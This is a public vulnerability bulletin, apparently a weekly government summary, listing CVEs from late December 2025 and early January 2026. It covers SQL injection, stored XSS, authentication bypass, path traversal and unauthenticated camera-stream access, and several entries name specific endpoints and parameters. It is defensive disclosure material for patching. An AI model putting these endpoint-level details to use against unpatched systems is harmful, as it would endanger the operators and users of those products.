| emlog--emlog | Emlog is an open source website building system. In version 2.5.23, the admin can set controls which makes users unable to edit or delete their articles after publishing them. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21429 | https://github.com/emlog/emlog/security/advisories/GHSA-jw5v-2g53-rx8w |
| emlog--emlog | Emlog is an open source website building system. In version 2.5.23, article creation functionality is vulnerable to cross-site request forgery (CSRF). This can lead to a user being forced to post an article with arbitrary, attacker-controlled content. This, when combined with stored cross-site scripting, leads to account takeover. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21430 | https://github.com/emlog/emlog/security/advisories/GHSA-2g2w-vmg7-pq4q |
| emlog--emlog | Emlog is an open source website building system. Version 2.5.23 has a stored cross-site scripting vulnerability in the `Resource media library ` function while publishing an article. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21431 | https://github.com/emlog/emlog/security/advisories/GHSA-9vc2-crhr-248x |
| emlog--emlog | Emlog is an open source website building system. Version 2.5.23 has a stored cross-site scripting vulnerability that can lead to account takeover, including takeover of admin accounts. As of time of publication, no known patched versions are available. | 2026-01-02 | not yet calculated | CVE-2026-21432 | https://github.com/emlog/emlog/security/advisories/GHSA-4rxf-mjqx-c464 |
| getsolus--eopkg | eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could escape the directory set by `--destdir`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be installed in the path given by `--destdir`, but on a different location on the host. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected. | 2026-01-01 | not yet calculated | CVE-2026-21436 | https://github.com/getsolus/eopkg/security/advisories/GHSA-786v-47cq-qm6m https://github.com/getsolus/eopkg/pull/201 https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d https://github.com/getsolus/eopkg/releases/tag/v4.4.0 |
| getsolus--eopkg | eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could include files that are not tracked by `eopkg`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be shown by `lseopkg` and related tools. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected. | 2026-01-01 | not yet calculated | CVE-2026-21437 | https://github.com/getsolus/eopkg/security/advisories/GHSA-hjp7-qwrj-6cc6 https://github.com/getsolus/eopkg/pull/201 https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d https://github.com/getsolus/eopkg/releases/tag/v4.4.0 |
| adonisjs--core | AdonisJS is a TypeScript-first web framework. A Path Traversal vulnerability in AdonisJS multipart file handling may allow a remote attacker to write arbitrary files to arbitrary locations on the server filesystem. This impacts @adonisjs/bodyparser through version 10.1.1 and 11.x prerelease versions prior to 11.0.0-next.6. This issue has been patched in @adonisjs/bodyparser versions 10.1.2 and 11.0.0-next.6. | 2026-01-02 | not yet calculated | CVE-2026-21440 | https://github.com/adonisjs/core/security/advisories/GHSA-gvq6-hvvp-h34h https://github.com/adonisjs/bodyparser/commit/143a16f35602be8561215611582211dec280cae6 https://github.com/adonisjs/bodyparser/commit/6795c0e3fa824ae275bbd992aae60609e96f0f03 https://github.com/adonisjs/bodyparser/releases/tag/v10.1.2 https://github.com/adonisjs/bodyparser/releases/tag/v11.0.0-next.6 |
| langflow-ai--langflow | Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization. Version 1.7.0.dev45 contains a patch. | 2026-01-02 | not yet calculated | CVE-2026-21445 | https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a |
| bagisto--bagisto | Bagisto is an open source laravel eCommerce platform. In versions on the 2.3 branch prior to 2.3.10, API routes remain active even after initial installation is complete. The underlying API endpoints (`/install/api/*`) are directly accessible and exploitable without any authentication. An attacker can bypass the Ib installer entirely by calling the API endpoints directly. This allows any unauthenticated attacker to create admin accounts, modify application configurations, and potentially overwrite existing data. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21446 | https://github.com/bagisto/bagisto/security/advisories/GHSA-6h7w-v2xr-mqvw https://github.com/bagisto/bagisto/commit/380c045e48490da740cd505fb192cc45e1809bed |
| bagisto--bagisto | Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection. When a normal customer orders any product, in the `add address` step they can inject a value to run in admin view. The issue can lead to remote code execution. Version 2.3.10 contains a patch. | 2026-01-02 | not yet calculated | CVE-2026-21448 | https://github.com/bagisto/bagisto/security/advisories/GHSA-5j4h-4f72-qpm6 |
| bagisto--bagisto | Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via first name and last name from a low-privilege user. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21449 | https://github.com/bagisto/bagisto/security/advisories/GHSA-mqhg-v22x-pqj8 |
| bagisto--bagisto | Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via type parameter, which can lead to remote code execution or another exploitation. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21450 | https://github.com/bagisto/bagisto/security/advisories/GHSA-9hvg-qw5q-wqwp |
| bagisto--bagisto | Bagisto is an open source laravel eCommerce platform. A stored Cross-Site Scripting (XSS) vulnerability exists in Bagisto prior to version 2.3.10 within the CMS page editor. Although the platform normally attempts to sanitize `<script>` tags, the filtering can be bypassed by manipulating the raw HTTP POST request before submission. As a result, arbitrary JavaScript can be stored in the CMS content and executed whenever the page is viewed or edited. This exposes administrators to a high-severity risk, including complete account takeover, backend hijacking, and malicious script execution. Version 2.3.10 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21451 | https://github.com/bagisto/bagisto/security/advisories/GHSA-2mwc-h2mg-v6p8 |
| knadh--listmonk | listmonk is a standalone, self-hosted, newsletter and mailing list manager. Prior to version 6.0.0, lower-privileged user with campaign management permissions can inject malicious JavaScript into campaigns or templates. When a higher-privileged user (Super Admin) views or previews this content, the XSS executes in their browser context, allowing the attacker to perform privileged actions such as creating backdoor admin accounts. The attack can be weaponized via the public archive feature, where victims simply need to visit a link - no preview click required. Version 6.0.0 fixes the issue. | 2026-01-02 | not yet calculated | CVE-2026-21483 | https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565 |
Vulnerability Summary for the Week of December 22, 2025
Posted on Monday December 29, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 9786--phpok3w | A vulnerability was identified in 9786 phpok3w up to 901d96a06809fb28b17f3a4362c59e70411c933c. Impacted is an unknown function of the file show.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-28 | 7.3 | CVE-2025-15142 | VDB-338520 | 9786 phpok3w show.php sql injection VDB-338520 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715574 | phpok3w 1.0 SQL Injection https://gitee.com/9786/phpok3w/issues/IDD1IZ |
| Alteryx--Server | A vulnerability was found in Alteryx Server. Affected by this issue is some unknown functionality of the file /gallery/api/status/. Performing manipulation results in improper authentication. The attack is possible to be carried out remotely. The exploit has been made public and could be used. Upgrading to version 2023.1.1.13.486, 2023.2.1.10.293, 2024.1.1.9.236, 2024.2.1.6.125 and 2025.1.1.1.31 can resolve this issue. Upgrading the affected component is recommended. | 2025-12-26 | 7.3 | CVE-2025-15097 | VDB-338428 | Alteryx Server status improper authentication VDB-338428 | CTI Indicators (IOB, IOC, IOA) Submit #710169 | Alteryx Alteryx Server 2020/2021/2022/2023/2024/2025 Authentication Bypass Issues https://ict-strypes.eu/wp-content/uploads/2025/12/Alteryx-Second-Research.pdf https://gist.github.com/apostolovd/f84631eed2f0c0e83e2e174b1480f08c https://help.alteryx.com/release-notes/en/release-notes/server-release-notes/server-2025-1-release-notes.html |
| Anviz Biometric Technology Co., Ltd.--Anviz AIM CrossChex Standard | Anviz AIM CrossChex Standard 4.3.6.0 contains a CSV injection vulnerability that allows attackers to execute commands by inserting malicious formulas in user import fields. Attackers can craft payloads in fields like 'Name', 'Gender', or 'Position' to trigger Excel macro execution when importing user data. | 2025-12-24 | 9.8 | CVE-2018-25135 | ExploitDB-45765 Anviz Biometric Technology Product Homepage Zero Science Lab Disclosure (ZSL-2018-5498) |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the 'duplicate_wpml_layout' function in all versions up to, and including, 2.9.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary posts with the content of other existing posts, potentially exposing private and password-protected content and deleting any content that is not saved in revisions or backups. Posts must have been created with Beaver Builder to be copied or updated. | 2025-12-23 | 8.1 | CVE-2025-12934 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc2db74d-61b9-498a-a0d8-e43466b06f37?source=cve https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-builder-model.php#L181 https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-builder-model.php#L5490 https://plugins.trac.wordpress.org/changeset/3425646/beaver-builder-lite-version/trunk |
| Beward R&D Co., Ltd--N100 H.264 VGA IP Camera | Beward N100 H.264 VGA IP Camera M2.1.6 contains an authenticated file disclosure vulnerability that allows attackers to read arbitrary system files via the 'READ.filePath' parameter. Attackers can exploit the fileread script or SendCGICMD API to access sensitive files like /etc/passwd and /etc/issue by supplying absolute file paths. | 2025-12-24 | 8.8 | CVE-2019-25246 | ExploitDB-46320 Beward Product Homepage Zero Science Lab Disclosure (ZSL-2019-5511) |
| Beward--N100 H.264 VGA IP Camera | Beward N100 M2.1.6.04C014 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve the camera's RTSP stream by exploiting the lack of authentication in the video access mechanism. | 2025-12-24 | 7.5 | CVE-2019-25248 | ExploitDB-46317 Beward Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5509) |
| Centreon--Infra Monitoring - Open-tickets | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring - Open-tickets (Notification rules configuration parameters, Open tickets modules) allows SQL Injection to user with elevated privileges.This issue affects Infra Monitoring - Open-tickets: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4. | 2025-12-22 | 7.2 | CVE-2025-12514 | https://github.com/centreon/centreon/releases |
| CMSimple--CMSimple | CMSimple 5.2 contains a stored cross-site scripting vulnerability in the Filebrowser External input field that allows attackers to inject malicious JavaScript. Attackers can place unfiltered JavaScript code that executes when users click on Page or Files tabs, enabling persistent script injection. | 2025-12-23 | 7.2 | CVE-2021-47732 | ExploitDB-49751 Official CMSimple Vendor Homepage VulnCheck Advisory: CMSimple 5.2 Stored Cross-Site Scripting via Filebrowser External Input |
| Cmsimple--Cmsimple | CMSimple 5.4 contains an authenticated remote code execution vulnerability that allows logged-in attackers to inject malicious PHP code into template files. Attackers can exploit the template editing functionality by crafting a reverse shell payload and saving it through the template editing endpoint with a valid CSRF token. | 2025-12-23 | 8.8 | CVE-2021-47735 | ExploitDB-50356 Official CMSimple Homepage VulnCheck Advisory: CMSimple 5.4 Authenticated Remote Code Execution via Template Editing |
| Cmsimple-Xh--CMSimple_XH | CMSimple_XH 1.7.4 contains an authenticated remote code execution vulnerability in the content editing functionality that allows administrative users to upload malicious PHP files. Attackers with valid credentials can exploit the CSRF token mechanism to create a PHP shell file that enables arbitrary command execution on the server. | 2025-12-23 | 8.8 | CVE-2021-47736 | ExploitDB-50367 Official Vendor Homepage VulnCheck Advisory: CMSimple_XH 1.7.4 Authenticated Remote Code Execution via Content Editing |
| Cobiansoft--Cobian Backup Gravity | Cobian Backup Gravity 11.2.0.582 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the CobianBackup11 service to inject malicious code that would execute with LocalSystem privileges during service startup. | 2025-12-22 | 8.4 | CVE-2022-50688 | ExploitDB-50791 Cobian Backup Official Vendor Homepage VulnCheck Advisory: Cobian Backup Gravity 11.2.0.582 Unquoted Service Path Privilege Escalation |
| code-projects--Online Farm System | A vulnerability was identified in code-projects Online Farm System 1.0. Affected is an unknown function of the file /addProduct.php. The manipulation of the argument Username leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-12-23 | 7.3 | CVE-2025-15049 | VDB-337854 | code-projects Online Farm System addProduct.php sql injection VDB-337854 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721001 | code-projects Online Farm System V1.0 SQL Injection https://github.com/xiaotsai/tttt/issues/1 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability was determined in code-projects Refugee Food Management System 1.0. The affected element is an unknown function of the file /home/home.php. This manipulation of the argument a causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-22 | 7.3 | CVE-2025-15012 | VDB-337718 | code-projects Refugee Food Management System home.php sql injection VDB-337718 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719788 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr17/issues/2 https://code-projects.org/ |
| code-projects--Simple Stock System | A vulnerability was found in code-projects Simple Stock System 1.0. Impacted is an unknown function of the file /logout.php. The manipulation of the argument uname results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2025-12-22 | 7.3 | CVE-2025-15011 | VDB-337717 | code-projects Simple Stock System logout.php sql injection VDB-337717 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719663 | Code-projects Simple Stock System v1.0 SQL Injection https://github.com/chunmingshanan/CVE/issues/1 https://code-projects.org/ |
| code-projects--Student Information System | A flaw has been found in code-projects Student Information System 1.0. This issue affects some unknown processing of the file /searchresults.php. Executing manipulation of the argument searchbox can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. | 2025-12-24 | 7.3 | CVE-2025-15053 | VDB-337859 | code-projects Student Information System searchresults.php sql injection VDB-337859 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #720796 | Fabian Ros Student Information System In PHP With Source Code November 2, 2025 SQL Injection https://github.com/i4G5d/CRITICAL-SEVERITY-VULNERABILITY-REPORT-Widespread-SQLI https://code-projects.org/ |
| CodexThemes--TheGem Theme Elements (for Elementor) | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CodexThemes TheGem Theme Elements (for Elementor).This issue affects TheGem Theme Elements (for Elementor): from n/a through 5.10.5.1. | 2025-12-23 | 7.5 | CVE-2025-68560 | https://vdp.patchstack.com/database/wordpress/plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-local-file-inclusion-vulnerability?_s_id=cve |
| D-Link--DSL-124 Wireless N300 ADSL2+ | D-Link DSL-124 ME_1.00 contains a configuration file disclosure vulnerability that allows unauthenticated attackers to retrieve router settings through a POST request. Attackers can send a specific POST request to the router's configuration endpoint to download a complete backup file containing sensitive network credentials and system configurations. | 2025-12-22 | 7.5 | CVE-2023-53974 | ExploitDB-51129 D-Link Official Homepage D-Link MEA Product Details Page VulnCheck Advisory: D-Link DSL-124 ME_1.00 Backup Configuration File Disclosure via Unauthenticated Request |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C Firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to remove user accounts without proper authentication. | 2025-12-22 | 9.8 | CVE-2023-53968 | ExploitDB-51457 DB Elettronica Telecomunicazioni Official Website SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5773) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Erase Account |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C firmware 1.9.3 contains an authentication bypass vulnerability that allows attackers to change the admin password without requiring the current credentials. Attackers can exploit the userManager.cgx API endpoint by sending a crafted POST request with a new MD5-hashed password to directly modify the admin account's authentication. | 2025-12-22 | 7.5 | CVE-2023-53967 | ExploitDB-51458 DB Elettronica Telecomunicazioni SpA Homepage SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5774) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Admin Password Change |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C firmware 1.9.3 contains a session management vulnerability that allows attackers to bypass authentication controls by exploiting IP address session binding. Attackers can reuse the same IP address and issue unauthorized requests to the userManager API to change user passwords without proper authentication. | 2025-12-22 | 7.5 | CVE-2023-53969 | ExploitDB-51456 DB Elettronica Telecomunicazioni Official Website SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5772) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Password Change |
| DB Elettronica Telecomunicazioni SpA--Screen SFT DAB 600/C | Screen SFT DAB 600/C Firmware 1.9.3 contains a weak session management vulnerability that allows attackers to bypass authentication controls by reusing IP-bound session identifiers. Attackers can exploit the vulnerable deviceManagement API endpoint to reset device configurations by sending crafted POST requests with manipulated session parameters. | 2025-12-22 | 7.5 | CVE-2023-53970 | ExploitDB-51459 DB Elettronica Telecomunicazioni Product Homepage SFT DAB Series Product Page Zero Science Lab Disclosure (ZSL-2022-5775) VulnCheck Advisory: Screen SFT DAB 600/C Firmware 1.9.3 Authentication Bypass Reset Board Config |
| devolo AG--dLAN 550 duo+ Starter Kit | devolo dLAN 500 AV Wireless+ 3.1.0-1 contains an authentication bypass vulnerability that allows attackers to enable hidden services through the htmlmgr CGI script. Attackers can enable telnet and remote shell services, reboot the device, and gain root access without a password by manipulating system configuration parameters. | 2025-12-24 | 9.8 | CVE-2019-25249 | ExploitDB-46325 Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2019-5508) |
| Eaton--Eaton UPS Companion Software | Improper authentication of library files in the Eaton UPS Companion software installer could lead to arbitrary code execution of an attacker with the access to the software package. This security issue has been fixed in the latest version of EUC which is available on the Eaton download center. | 2025-12-26 | 8.6 | CVE-2025-59887 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1026.pdf |
| Eaton--Eaton xComfort ECI | Improper input validation at one of the endpoints of Eaton xComfort ECI's web interface, could lead into an attacker with network access to the device executing privileged user commands. As cybersecurity standards continue to evolve and to meet our requirements today, Eaton has decided to discontinue the product. Upon retirement or end of support, there will be no new security updates, non-security updates, or paid assisted support options, or online technical content updates. | 2025-12-23 | 8.8 | CVE-2025-59886 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1022.pdf |
| Eaton--UPS Companion software | Due to insecure library loading in the Eaton UPS Companion software executable, an attacker with access to the software package could perform arbitrary code execution . This security issue has been fixed in the latest version of EUC which is available on the Eaton download center. | 2025-12-26 | 7.8 | CVE-2025-67450 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1027.pdf |
| Echo Call Center Services Trade and Industry Inc.--Specto CM | Unrestricted Upload of File with Dangerous Type vulnerability in Echo Call Center Services Trade and Industry Inc. Specto CM allows Remote Code Inclusion.This issue affects Specto CM: before 17032025. | 2025-12-24 | 8.8 | CVE-2025-2155 | https://www.usom.gov.tr/bildirim/tr-25-0480 |
| Eclipse Foundation--BlueChi | A vulnerability was found in BlueChi, a multi-node systemd service controller used in RHIVOS. This flaw allows a user with root privileges on a managed node (qm) to create or override systemd service unit files that affect the host node. This issue can lead to privilege escalation, unauthorized service execution, and potential system compromise. | 2025-12-24 | 7.2 | CVE-2025-2515 | https://access.redhat.com/security/cve/CVE-2025-2515 RHBZ#2353313 https://github.com/eclipse-bluechi/bluechi/commit/fe0d28301ce2bd45f0b1d8a98a94efef799fbc73#diff-64140c83db42a8888f346a40de293b80f79ebf7d75ce4137b22567e360bce607 https://github.com/eclipse-bluechi/bluechi/issues/1069 https://github.com/eclipse-bluechi/bluechi/pull/1073 |
| Epic Games--Easy Anti-Cheat | Epic Games Easy Anti-Cheat 4.0 contains an unquoted service path vulnerability that allows local non-privileged users to execute arbitrary code with elevated system privileges. Attackers can exploit the service configuration by inserting malicious code in the system root path that would execute with LocalSystem privileges during application startup. | 2025-12-23 | 8.4 | CVE-2021-47739 | ExploitDB-49841 Epic Games Official Website Easy Anti-Cheat Official Website Zero Science Lab Disclosure (ZSL-2021-5652) VulnCheck Advisory: Epic Games Easy Anti-Cheat 4.0 Local Privilege Escalation via Unquoted Service Path |
| FantasticLBP--Hotels_Server | A security vulnerability has been detected in FantasticLBP Hotels_Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. Affected by this issue is some unknown functionality of the file /controller/api/Room.php. Such manipulation of the argument hotelId leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 7.3 | CVE-2025-15127 | VDB-338505 | FantasticLBP Hotels_Server Room.php sql injection VDB-338505 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711809 | Github Hotels_Server v1.0 SQL Injection https://github.com/liangmingpku/CVE/issues/1 |
| fedify-dev--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2, a Regular Expression Denial of Service (ReDoS) vulnerability exists in Fedify's document loader. The HTML parsing regex at packages/fedify/src/runtime/docloader.ts:259 contains nested quantifiers that cause catastrophic backtracking when processing maliciously crafted HTML responses. This issue has been patched in versions 1.6.13, 1.7.14, 1.8.15, and 1.9.2. | 2025-12-22 | 7.5 | CVE-2025-68475 | https://github.com/fedify-dev/fedify/security/advisories/GHSA-rchf-xwx2-hm93 https://github.com/fedify-dev/fedify/commit/2bdcb24d7d6d5886e0214ed504b63a6dc5488779 https://github.com/fedify-dev/fedify/commit/bf2f0783634efed2663d1b187dc55461ee1f987a https://github.com/fedify-dev/fedify/releases/tag/1.6.13 https://github.com/fedify-dev/fedify/releases/tag/1.7.14 https://github.com/fedify-dev/fedify/releases/tag/1.8.15 https://github.com/fedify-dev/fedify/releases/tag/1.9.2 |
| FLIR Systems, Inc.--Brickstream 3D+ | FLIR Brickstream 3D+ 2.1.742.1842 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can retrieve video stream images by directly accessing multiple image endpoints like middleImage.jpg, rightimage.jpg, and leftimage.jpg. | 2025-12-24 | 7.5 | CVE-2018-25136 | ExploitDB-45607 FLIR Brickstream Product Homepage Zero Science Lab Disclosure (ZSL-2018-5496) |
| FLIR Systems, Inc.--FLIR AX8 Thermal Camera | FLIR AX8 Thermal Camera 1.32.16 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly connect to the RTSP stream using tools like VLC or FFmpeg to view and record thermal camera footage. | 2025-12-24 | 7.5 | CVE-2018-25139 | ExploitDB-45606 FLIR Systems Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5492) |
| FLIR Systems, Inc.--FLIR Brickstream 3D+ | FLIR Brickstream 3D+ 2.1.742.1842 contains an unauthenticated vulnerability in the ExportConfig REST API that allows attackers to download sensitive configuration files. Attackers can exploit the getConfigExportFile.cgi endpoint to retrieve system configurations, potentially enabling authentication bypass and privilege escalation. | 2025-12-24 | 7.5 | CVE-2018-25137 | ExploitDB-45599 FLIR Brickstream Product Homepage Zero Science Lab Disclosure (ZSL-2018-5495) |
| FLIR Systems, Inc.--Thermal Traffic Cameras | FLIR thermal traffic cameras contain an unauthenticated device manipulation vulnerability in their WebSocket implementation that allows attackers to bypass authentication and authorization controls. Attackers can directly modify device configurations, access system information, and potentially initiate denial of service by sending crafted WebSocket messages without authentication. | 2025-12-24 | 7.5 | CVE-2018-25140 | ExploitDB-45539 FLIR Systems Official Website Zero Science Lab Disclosure (ZSL-2018-5490) |
| FLIR Systems--FLIR AX8 Thermal Camera | FLIR AX8 Thermal Camera 1.32.16 contains hard-coded SSH and web panel credentials that cannot be changed through normal camera operations. Attackers can exploit these persistent credentials to gain unauthorized shell access and login to multiple camera interfaces using predefined username and password combinations. | 2025-12-24 | 7.5 | CVE-2018-25138 | ExploitDB-45629 FLIR Systems Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5494) |
| FLIR--FLIR Thermal Traffic Cameras | FLIR thermal traffic cameras contain an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly retrieve video streams by accessing specific endpoints like /live.mjpeg, /snapshot.jpg, and RTSP streaming URLs without authentication. | 2025-12-24 | 7.5 | CVE-2018-25141 | ExploitDB-45537 FLIR Official Vendor Homepage Zero Science Lab Disclosure (ZSL-2018-5489) |
| FluidSynth--fluidsynth | FluidSynth is a software synthesizer based on the SoundFont 2 specifications. From versions 2.5.0 to before 2.5.2, a race condition during unloading of a DLS file can trigger a heap-based use-after-free. A concurrently running thread may be pending to unload a DLS file, leading to use of freed memory, if the synthesizer is being concurrently destroyed, or samples of the (unloaded) DLS file are concurrently used to synthesize audio. This issue has been patched in version 2.5.2. The problem will not occur, when explicitly unloading a DLS file (before synth destruction), provided that at the time of unloading, no samples of the respective file are used by active voices. The problem will not occur in versions of FluidSynth that have been compiled without native DLS support. | 2025-12-23 | 7 | CVE-2025-68617 | https://github.com/FluidSynth/fluidsynth/security/advisories/GHSA-ffw2-xvvp-39ch https://github.com/FluidSynth/fluidsynth/issues/1717 https://github.com/FluidSynth/fluidsynth/issues/1728 https://github.com/FluidSynth/fluidsynth/commit/685e54cdc44911ace31774260bd0c9ec89887491 https://github.com/FluidSynth/fluidsynth/commit/962b9946b5cb6b16f0c08b89dd1b7016d4fce886 |
| FreyrSCADA--IEC-60870-5-104 | FreyrSCADA/IEC-60870-5-104 server v21.06.008 allows remote attackers to cause a denial of service by sending specific message sequences. | 2025-12-23 | 7.5 | CVE-2024-9684 | https://github.com/FreyrSCADA/IEC-60870-5-104/issues/6 https://drive.google.com/drive/folders/1pBPZR59d_rlixH7ZysUmmbOEZvjZV9g1 |
| Gitea--Gitea | Gitea before 1.23.0 allows attackers to add attachments with forbidden file extensions by editing an attachment name via an attachment API. | 2025-12-26 | 8.2 | CVE-2025-68939 | https://blog.gitea.com/release-of-1.23.0/ https://github.com/go-gitea/gitea/releases/tag/v1.23.0 https://github.com/go-gitea/gitea/pull/32151 |
| GnuPG--GnuPG | In GnuPG through 2.4.8, armor_filter in g10/armor.c has two increments of an index variable where one is intended, leading to an out-of-bounds write for crafted input. | 2025-12-28 | 7.8 | CVE-2025-68973 | https://gpg.fail/memcpy https://news.ycombinator.com/item?id=46403200 https://www.openwall.com/lists/oss-security/2025/12/28/5 https://github.com/gpg/gnupg/commit/115d138ba599328005c5321c0ef9f00355838ca9 https://github.com/gpg/gnupg/blob/ff30683418695f5d2cc9e6cf8c9418e09378ebe4/g10/armor.c#L1305-L1306 |
| Guangzhou V-SOLUTION Electronic Technology Co., Ltd.--SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform v2.03 contains a privilege escalation vulnerability that allows normal users to gain administrative access by manipulating the user role parameter. Attackers can send a crafted HTTP POST request to the user management endpoint with 'user_role_mod' set to integer value '1' to elevate their privileges. | 2025-12-24 | 9.8 | CVE-2019-25237 | ExploitDB-47435 V-SOL Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5538) |
| Guangzhou V-SOLUTION Electronic Technology--GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform 2.03 contains an unauthenticated information disclosure vulnerability that allows attackers to download configuration files via direct object reference. Attackers can retrieve sensitive configuration data by sending HTTP GET requests to the usrcfg.conf endpoint, potentially enabling authentication bypass and system access. | 2025-12-24 | 7.5 | CVE-2019-25239 | ExploitDB-47433 V-SOL Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5534) |
| Hasura--Hasura GraphQL | Hasura GraphQL 1.3.3 contains a denial of service vulnerability that allows attackers to overwhelm the service by crafting malicious GraphQL queries with excessive nested fields. Attackers can send repeated requests with extremely long query strings and multiple threads to consume server resources and potentially crash the GraphQL endpoint. | 2025-12-22 | 7.5 | CVE-2021-47713 | ExploitDB-49789 Hasura GraphQL Engine GitHub Repository VulnCheck Advisory: Hasura GraphQL 1.3.3 Denial of Service via Malicious GraphQL Query |
| Hitachi--Hitachi Infrastructure Analytics Advisor | Cross-site Scripting vulnerability in Hitachi Infrastructure Analytics Advisor (Data Center Analytics component) and Hitachi Ops Center Analyzer (Hitachi Ops Center Analyzer detail view component).This issue affects Hitachi Infrastructure Analytics Advisor:; Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.5-00. | 2025-12-24 | 8.2 | CVE-2025-66444 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-133/index.html |
